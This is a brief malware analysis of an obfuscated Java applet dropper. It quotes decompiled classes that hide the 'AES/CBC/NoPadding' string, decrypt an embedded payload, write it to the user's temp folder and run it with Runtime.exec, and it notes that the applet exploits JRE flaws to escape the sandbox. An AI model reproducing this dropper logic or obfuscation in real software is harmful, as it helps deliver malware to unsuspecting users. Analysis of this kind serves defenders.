Class Fiovt:
import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; public class Fiovt { static String TOba = "HRfES".replace("HRf", "A"); public static void Orob() throws Exception { Ditr.vub = Cipher.getInstance(Akula.Lupan); IvParameterSpec Olghie = new IvParameterSpec("987a1c451dd271da".getBytes()); Ditr.vub.init(2, Gozl.Nyvuitp, Olghie); } }
The string Akula.Lupan is constructed using an obfuscation:
static String Lupan = "AE".concat("S/CB").concat("C/NoPa").concat("dding");
the string actually it becomes “AES/CBC/NoPadding” and then the AES cipher is initialized using the secret key is embedded into the class. The decrypted file is written to a temporary file at the user’s temporary folder and then it is executed via the Envu class:
public class Envu { ... public static void Kepant(byte[] kistas, String baba) throws Exception { FileOutputStream xrjs = new FileOutputStream(baba); int sccxy = kistas.length; xrjs.write(kistas, 0, sccxy); xrjs.close(); Runtime.getRuntime().exec(baba); } ... }
The tricky part that a Java applet is not allowed to execute EXE files and it uses various JRE vulnerabilities to elevate privileges and bypass sandbox controls.